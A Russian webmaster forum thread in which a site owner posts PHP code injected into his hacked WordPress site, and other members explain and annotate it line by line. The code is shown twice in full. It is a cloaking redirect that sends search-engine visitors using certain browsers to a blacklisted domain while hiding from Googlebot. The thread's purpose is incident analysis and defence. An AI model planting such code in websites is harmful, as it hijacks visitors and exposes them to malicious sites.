Подскажите что делает код

Тема в разделе "Как сделать...", создана пользователем Obormot, 16 май 2014.

  1. Obormot

    Obormot Постоялец

    Регистр.:
    10 янв 2012
    Сообщения:
    88
    Симпатии:
    2
    Ломанули сайт на днях, вот такое появилось в файлах )
    Подскажите что делает ?
    Код:
    <?� z��(m��_u�(u("error_reporting(0); if (!headers_sent()){ if (isset($_SERVER['HTTP_USER_AGENT'])){ if (isset($_SERVER['HTTP_REFERER'])){ if ((preg_match ("/MSIE (9.0|10.0)/",$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/rv:[0-9]+\.0\) like Gecko/",$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/Firefox\/([0-9]+\.0)/",$_SERVER['HTTP_USER_AGENT'],$matchf) and $matchf[1]>11)){ if(!preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])){ if (stristr($_SERVER['HTTP_REFERER'],"yahoo.") or stristr($_SERVER['HTTP_REFERER'],"bing.") or preg_match ("/google\.(.*?)\/url\?sa/",$_SERVER['HTTP_REFERER'])) { if (!stristr($_SERVER['HTTP_REFERER'],"cache") and !stristr($_SERVER['HTTP_REFERER'],"inurl") and !stristr($_SERVER['HTTP_REFERER'],"EeYp3D7")){ header("Location: http://fptjsjbjs.rebatesrule.net/"); exit(); } } } } } } }"));?>
    Изначально было в base64, расшифровал при помощи скрипта из гугл.
     
  2. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    599
    Симпатии:
    469
    Код при определенных условиях (юзерагент, реферер) редиректит на
     
  3. Obormot

    Obormot Постоялец

    Регистр.:
    10 янв 2012
    Сообщения:
    88
    Симпатии:
    2
    Сайт погуглил он везде в черных списках.
    А вообще для чего это делается? Не в рекламных введь целях?
     
  4. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    599
    Симпатии:
    469
    Нет, не в рекламных. С сайта при помощи этого кода крадут посетителей.
     
    Obormot нравится это.
  5. Denixxx

    Denixxx

    Регистр.:
    7 фев 2014
    Сообщения:
    247
    Симпатии:
    191
    Я думаю это будущие хакеры тестировали свои скрипты, не покупая хостинга.
    Взяли VDS "на пробу", попросили хостера прикрутить VDS к бесплатному доменному имени сервиса http://rebatesrule.net/services/free-dynamic-dns/
    Запустили машинку и собрали статистику с уязвимых сайтов, пока их не отключили.
    Так что, раз им всё удалось, скорее всего последует новая атака.
    Уже будут редиректить на клиента, за деньги;)
    Почему так думаю:
    1. Бесплатный домен — если бы платили за него, потерять было бы жалко.
    2. Домен 3 уровня из бессмысленного набора символов — для себя такой не возьмешь и даром.
    3. Судя по остаткам в поисковиках, успели поработать с неделю всего — потом наверно забанили.
    Если у будущих «ломателей» нет фантазии, то «ломать» снова будут тоже с бесплатного домена 3 уровня.
    Так что можно попробовать внести в блек-лист домены с выпадающего списка регистрации на этой странице http://rebatesrule.net/services/free-dynamic-dns/
    И обновить движок, конечно.
    А сайт-то на каком движке, если не секрет?
     
    Последнее редактирование: 16 май 2014
    Obormot нравится это.
  6. PapaJoe

    PapaJoe

    Регистр.:
    4 авг 2008
    Сообщения:
    620
    Симпатии:
    311
    PHP:
    <?? z??(m??_u?(u("error_reporting(0);
    if (!headers_sent()){
    if (isset(
    $_SERVER['HTTP_USER_AGENT'])){
    if (isset(
    $_SERVER['HTTP_REFERER'])){
    if ((preg_match ("
    /MSIE (9.0|10.0)/",$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/rv:[0-9]+\.0\) like Gecko/",$_SERVER['HTTP_USER_AGENT']))
    or (preg_match ("
    /Firefox\/([0-9]+\.0)/",$_SERVER['HTTP_USER_AGENT'],$matchf) and $matchf[1]>11)
    ){
    if(!preg_match("
    /^66\.249\./",$_SERVER['REMOTE_ADDR'])){
    if (stristr(
    $_SERVER['HTTP_REFERER'],"yahoo.")
    or stristr(
    $_SERVER['HTTP_REFERER'],"bing.")
    or preg_match ("
    /google\.(.*?)\/url\?sa/",$_SERVER['HTTP_REFERER'])) {
    if (!stristr(
    $_SERVER['HTTP_REFERER'],"cache")
    and !stristr(
    $_SERVER['HTTP_REFERER'],"inurl")
    and !stristr(
    $_SERVER['HTTP_REFERER'],"EeYp3D7")){
    header("
    Locationhttp://fptjsjbjs.rebatesrule.net/"); exit();
    }
    }
    }
    }
    }
    }
    }
    "));
    ?>

    1. Если ещё не были отправлены заголовки !headers_sent()
    2. Если есть юзер-агент isset($_SERVER['HTTP_USER_AGENT']))
    3. Если это Экплорер 9 или 10 версии или Хром или файрфокс выше 11 версии
    4. Если это не "определенные" лица обращаются к странице, !preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])
    5. Если посетитель приперся с поисковиков юху, бинг или гугл
    6. Если, переходя с поисковика, посетитель не искал слова "cache", "inurl", "EeYp3D7"
    тогда редирект на http://fptjsjbjs.rebatesrule.net/
     
    Obormot и penguen нравится это.
  7. Obormot

    Obormot Постоялец

    Регистр.:
    10 янв 2012
    Сообщения:
    88
    Симпатии:
    2
    Был старенький вопрс пресс версии осени 2013, не обновлялся, ибо шаблон новые версии не держал.
    Сейчас все обновил, поменял везде пароли, свой комп посмотрел всякими removal-тулсами.

    Посмотрим... очень обидно будет в бан ПС влететь из-за подобного кода (

    Вообще с вордпрессами беда какая-то, у меня несколько сайтов на разных хостах, везде стоят инидкаторы неверных входов в панель - ежедневно блокируется порядка 1-4 попыток входа (более 5 раз неверный пароль).
    До того как постваил эти скрипты была вообще жесть, смотрел логи за сутки прилетало штук по 500 запросов на авторизацию.. ЦП на хосте даже выходил на лимиты
     
    Последнее редактирование модератором: 19 май 2014
  8. penguen

    penguen

    Регистр.:
    7 янв 2007
    Сообщения:
    820
    Симпатии:
    93
    Брутят, соотв. возрастает нагрузка на ЦП. поставте антиспам-бот+пароль на директорию+заход лишь с ваших айпишников и всё.
     
  9. vvs777

    vvs777 Создатель

    Регистр.:
    5 авг 2008
    Сообщения:
    22
    Симпатии:
    8
    Исходный скрипт - редирект юзера по браузерам и при условии что это не поисковый робот. Типичный код.
    По бруту - если мощность большая и нагрузка существенная есть смысл ставить костыли, но проще перенести/переименовать админку. 99% брутеров юзают стандартные скрипты
     
  10. MacGyver

    MacGyver Создатель

    Регистр.:
    26 авг 2007
    Сообщения:
    19
    Симпатии:
    7
    Более дырявого движка, чем ворд пресс я не встречал. Как-то глянул в самую свежую сборку, а в ней 23 незакрытых уязвимости по данным milw0rm.com ...